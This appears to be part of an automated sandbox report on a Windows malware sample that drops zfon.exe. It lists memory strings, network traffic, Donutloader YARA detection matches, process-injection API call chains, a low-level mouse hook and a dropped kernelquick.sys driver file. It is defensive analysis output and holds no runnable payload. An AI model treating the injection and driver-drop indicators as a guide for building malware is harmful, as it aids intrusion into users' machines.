00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://nydus.battle.net/Pro/
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000E.00000003.2663848409.0000000008EC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2668179739.0000000008EC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656028707.0000000008ECC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2671733531.0000000008EC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2658351434.0000000008ECC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681947926.0000000008ECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000000B.00000002.2597298593.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2568860335.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 0000000E.00000003.3867808677.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3870691749.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3865469179.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008E7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000000B.00000002.2589830986.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 0000000B.00000002.2589830986.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
Source: explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.comz
Source: zfon.exe, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.battle.net/shop/simplecheckout/debug-harness
Source: zfon.exe, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.battle.net/shop/simplecheckout/error
Source: zfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.battle.net/shop/simplecheckout/error?error=
Source: zfon.exe, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: zfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarh
Source: zfon.exe, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.battle.net/shop/simplecheckout/navbar
Source: VJQyKuHEUe.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownHTTPS traffic detected: 3.5.237.31:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: hh.exe, 00000007.00000002.4592875311.000001CDCB890000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_8fa85bfd-f
Source: C:\Windows\hh.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior

System Summary

barindex
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 6.2.zfon.exe.7ff7f96e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000000.2552109850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.2582901850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.2529216553.000001AB8875C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.4591031165.000001CDCB5B0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000003.2529019018.000002DC4A449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000002.2604535605.000002DC4BEE7000.00000008.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F9818AD3 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,6_2_00007FF7F9818AD3
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE42030 NtQueryInformationProcess,_invalid_parameter_noinfo_noreturn,6_2_000002DC4BE42030
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB5DF9BC NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,7_2_000001CDCB5DF9BC
Source: C:\Windows\explorer.exeCode function: 11_2_03073A07 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,11_2_03073A07
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB90C340: CreateFileW,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,7_2_000001CDCB90C340
Source: C:\Windows\hh.exeFile created: C:\ProgramData\kernelquick.sysJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeCode function: 0_2_0275E0040_2_0275E004
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F96EA9205_2_00007FF7F96EA920
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F96E79C05_2_00007FF7F96E79C0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F96EF0605_2_00007FF7F96EF060
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F96E6FC05_2_00007FF7F96E6FC0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F97021705_2_00007FF7F9702170
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF7F970E5C05_2_00007FF7F970E5C0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90E7AA85_2_00007FF8B90E7AA8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B9112AE05_2_00007FF8B9112AE0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B91132B85_2_00007FF8B91132B8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B910816C5_2_00007FF8B910816C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B91089505_2_00007FF8B9108950
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90E81D85_2_00007FF8B90E81D8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90F34105_2_00007FF8B90F3410
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90E6C745_2_00007FF8B90E6C74
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B91144A05_2_00007FF8B91144A0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B911A39E5_2_00007FF8B911A39E
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B91073E05_2_00007FF8B91073E0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90F4E105_2_00007FF8B90F4E10
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B91046085_2_00007FF8B9104608
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B9100E305_2_00007FF8B9100E30
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B910363C5_2_00007FF8B910363C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B911169C5_2_00007FF8B911169C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90F5E805_2_00007FF8B90F5E80
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B91016F05_2_00007FF8B91016F0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B91005705_2_00007FF8B9100570
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B91165805_2_00007FF8B9116580
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90F40E05_2_00007FF8B90F40E0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B9101F105_2_00007FF8B9101F10
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B91067205_2_00007FF8B9106720
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B911A39E5_2_00007FF8B911A39E
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90E5FC85_2_00007FF8B90E5FC8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8BFB57CA05_2_00007FF8BFB57CA0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F9818AD36_2_00007FF7F9818AD3
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F98182C76_2_00007FF7F98182C7
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F96EA9206_2_00007FF7F96EA920
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F96E79C06_2_00007FF7F96E79C0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F96EF0606_2_00007FF7F96EF060
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F96E6FC06_2_00007FF7F96E6FC0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F97021706_2_00007FF7F9702170
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F98173EB6_2_00007FF7F98173EB
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F98186A36_2_00007FF7F98186A3
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F97516306_2_00007FF7F9751630
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F970E5C06_2_00007FF7F970E5C0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_00007FF7F98195876_2_00007FF7F9819587
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE9E3346_2_000002DC4BE9E334
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BEAB3086_2_000002DC4BEAB308
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE862606_2_000002DC4BE86260
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE4E1E06_2_000002DC4BE4E1E0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE501E06_2_000002DC4BE501E0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE9F0E06_2_000002DC4BE9F0E0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BEB00A86_2_000002DC4BEB00A8
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BEAC08C6_2_000002DC4BEAC08C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE57FA46_2_000002DC4BE57FA4
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BEA96AC6_2_000002DC4BEA96AC
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE86B406_2_000002DC4BE86B40
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BEB5B586_2_000002DC4BEB5B58
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE52A606_2_000002DC4BE52A60
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE6A9C46_2_000002DC4BE6A9C4
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BEB58DC6_2_000002DC4BEB58DC
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE5DF4C6_2_000002DC4BE5DF4C
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE4CEC06_2_000002DC4BE4CEC0
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BEA8E706_2_000002DC4BEA8E70
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BEA7E346_2_000002DC4BEA7E34
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE69D206_2_000002DC4BE69D20
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE77D146_2_000002DC4BE77D14
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB5DF9BC7_2_000001CDCB5DF9BC
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB5DF58C7_2_000001CDCB5DF58C
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB5E04647_2_000001CDCB5E0464
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB5DE2D47_2_000001CDCB5DE2D4
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8FB4107_2_000001CDCB8FB410
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8FF3507_2_000001CDCB8FF350
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F63707_2_000001CDCB8F6370
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F72D07_2_000001CDCB8F72D0
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F7A607_2_000001CDCB8F7A60
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB921F887_2_000001CDCB921F88
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB90ADA07_2_000001CDCB90ADA0
